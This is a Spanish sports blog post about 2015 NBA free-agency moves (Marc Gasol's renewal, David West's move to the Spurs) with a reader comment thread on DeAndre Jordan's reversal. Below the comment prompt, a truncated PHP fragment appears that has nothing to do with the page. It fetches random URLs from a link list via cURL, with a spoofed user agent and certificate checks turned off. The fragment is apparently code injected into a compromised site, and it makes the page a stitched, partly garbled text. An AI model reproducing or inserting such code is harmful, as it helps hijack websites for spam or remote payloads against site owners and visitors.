Mercado NBA: Marc Gasol se merece el máximo

07 de July de 2015 por txusma

Por fin se confirma la noticia que todos esperábamos desde hace tiempo: Marc Gasol se queda en los Grizzlies a cambio del máximo, 110 millones de dólares en 5 años de contrato, el último a decisión del jugador. Lamentablemente, esta decisión ha provocado ya un efecto colateral: el pívot español no acudirá al Eurobasket de septiembre. Si yo le pagara tantísimo dinero tampoco vería con buenas ojos que se fuera a jugar “pachangas” en verano cuando debería estar descansando y preparándose para la nueva temporada. El negocio manda.

El montante de la renovación de Gasol contrasta con el fichaje de David West por los San Antonio Spurs, toda una sorpresa. El ex-alapívot de los Pacers renunció a 12 millones de dólares y jugará en la franquicia tejana a cambio ¡del mínimo!, apenas 1,2 millones. Ha renunciado a más de 10 millones de dólares por tener la oportunidad de pelear por el anillo al lado de Duncan, Aldridge, Kawhi, Parker y… Manu Ginóbili, que ayer confirmó que jugará una temporada más. 

Y a parte de estos dos movimientos:

Mo Williams regresa a los Cavs. Jugará junto a Kevin Love y Kyrie Irving (porque de Lebron y Thompson no sabemos nada) durante 2 años por 4.3 millones.
– El serbio Nemanja Bjelica llega a la NBA con un contrato de 3 años bajo el brazo. Jugará con los Minnesota Timberwolves al lado de Ricky Rubio, Andrew Wiggins y Karl-Anthony Towns.
– A la espera de Jeremy Lin, los Mavs atan a JJ Barea que jugará un par de temporadas más con los tejanos por 5.6 millones.
– Joe Ingles y Leandro Barbosa también renuevan por sus respectivos equipos. El australiano se queda en los Jazz durante dos años a cambio de 4.5 millones y el brasileño, de 33 años ya, jugará un año más con los Warriors por 2.5 millones.

Comenta

12 comentarios a esta entrada

  1. Tobal dice:
    #1

    Es que Marc Gasol es el mejor pívot de la NBA,supongo que se queda en Memphis,porque ve posibilidades reales de ganar un campeonato,pues ofertas de franquicias más importantes ha tenido.

      Citar

  2. Vader dice:
    #2

    Jojojo ahora parece que D.Jordan se esta replanteando su decisión y que podría decidir continuar en los Clippers… Menudo espectáculo y muestra de inmadurez. Lo quería para mis Knicks porque es una bestia pero ahora me alegro de que no viniera. En mi franquicia quiero jugadores profesionales, maduros y ganadores. Vamos, lo mismo que tienen los Spurs desde hace muchos años y los Warriors ahora mismo. Los JR Smiths, Waiters, Feltons, etc… por mucho calidad que tengan al final son fuente de problemas.

      Citar

  3. Lucho dice:
    #3

    Coincido mucho con Vader. Esa clase de jugadores son que valen la pena, sino Melo Anthony hubiera llegado mas lejos porque talento tiene.
    En lo que no concuerdo es con DeAndre, nunca me parecio un jugador que me gustaria tener en mi equipo. Marc por ejemplo es todo lo que esta bien, suma en cualquier clase de equipo

      Citar

  4. Vader dice:
    #4

    Ya se ha confirmado, ha firmado con Clippers. Menuda cara se les habrá quedado a los Mavs… Mathews firmo con ellos después de que Jordan dijera que iria a Dallas, etc… Los ha dejado hundidos y sin opciones a firmar una alternativa. Pero bueno, esta en su derecho de hacerlo si ha cambiado de opinión…

      Citar

  5. Jose Luis dice:
    #5

    Hombre lo que pasa es que a mi esto… me parece una forma de desarmar a un rival.

    Yo estoy en un equipo, acuerdo firmar por otro, asi este no se refuerza… y luego firmo con mi propio equipo, dejando al rival con un palmo de narices

    es una vergüenza

      Citar

  6. Triceratops dice:
    #6

    Jose Luis:
    Hombre lo que pasa es que a mi esto… me parece una forma de desarmar a un rival.

    Yo estoy en un equipo, acuerdo firmar por otro, asi este no se refuerza… y luego firmo con mi propio equipo, dejando al rival con un palmo de narices

    es una vergüenza

    Pero los Clippers no han hecho nada malo. Han mirado por sus intereses intentando convencer a Deandre hasta el ultimo momento. Chapeau por ellos que lo han logrado.
    Ahora, Deandre Jordan y su agente (que no se vaya de rositas) pierden toda la credibilidad y han quedado como unos sinverguenzas.

    Y ojo a Clippers que los mete nuevamente en la pomada, y ahora podran firmar a muchos FA (Boozer, Amare, McGee, Josh Smith) que sin la presencia de Jordan no querian firmar por los angelinos

      Citar

  7. MagicJohnson32 dice:
    #7

    Triceratops: Pero los Clippers no han hecho nada malo. Han mirado por sus intereses intentando convencer a Deandre hasta el ultimo momento. Chapeau por ellos que lo han logrado.
    Ahora, Deandre Jordan y su agente (que no se vaya de rositas) pierden toda la credibilidad y han quedado como unos sinverguenzas.

    Discutible, muy discutible eso de que los Clippers no han hecho nada malo. Forman parte necesaria de un precedente muy peligroso y muy dañino. Porque ojo, los Clippers no se han limitado a escuchar al jugador después de que éste rechazase a los Mavs sino que han sido parte activa (¡más que activa, que se encerraron en casa de DeAndre hasta que firmó el contrato!). Ahí reside la diferencia fundamental entre defender tus intereses y perder el honor. Así no se hacen las cosas.

      Citar

  8. Triceratops dice:
    #8

    MagicJohnson32: Discutible, muy discutible eso de que los Clippers no han hecho nada malo. Forman parte necesaria de un precedente muy peligroso y muy dañino. Porque ojo, los Clippers no se han limitado a escuchar al jugador después de que éste rechazase a los Mavs sino que han sido parte activa (¡más que activa, que se encerraron en casa de DeAndre hasta que firmó el contrato!). Ahí reside la diferencia fundamental entre defender tus intereses y perder el honor. Así no se hacen las cosas.

    Tampoco creo que hayan secuestrado a Jordan a punto de pistola. Ellos han visto que tenían opciones de que Jordan siguiera con ellos y han insistido hasta conseguirlo.

      Citar

  9. MagicJohnson32 dice:
    #9

    Triceratops: Tampoco creo que hayan secuestrado a Jordan a punto de pistola. Ellos han visto que tenían opciones de que Jordan siguiera con ellos y han insistido hasta conseguirlo.

    Sí, ya. Y ahora que todos sigan su ejemplo, y verás qué bien nos lo pasamos.

      Citar

  10. Jose Luis dice:
    #10

    Hombre… que el Presidente de la Asociación de Jugadores incite a su compañero a romper un acuerdo verbal… tampoco lo veo muy lógico 😛

    no sé con qué cara sigue siendo Presidente

      Citar

  11. FRANCHO dice:
    #11

    Ojala se cruzen en Play offs Mavs y Clippers

      Citar

  12. nba dice:
    #12

    Tampoco hay que rasgarse las vestiduras que no estamos hablando de choosen one, con este tipo en sus filas los clippers se pueden olvidar de llegar lejos salvo que cp3 le ponga en vereda

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>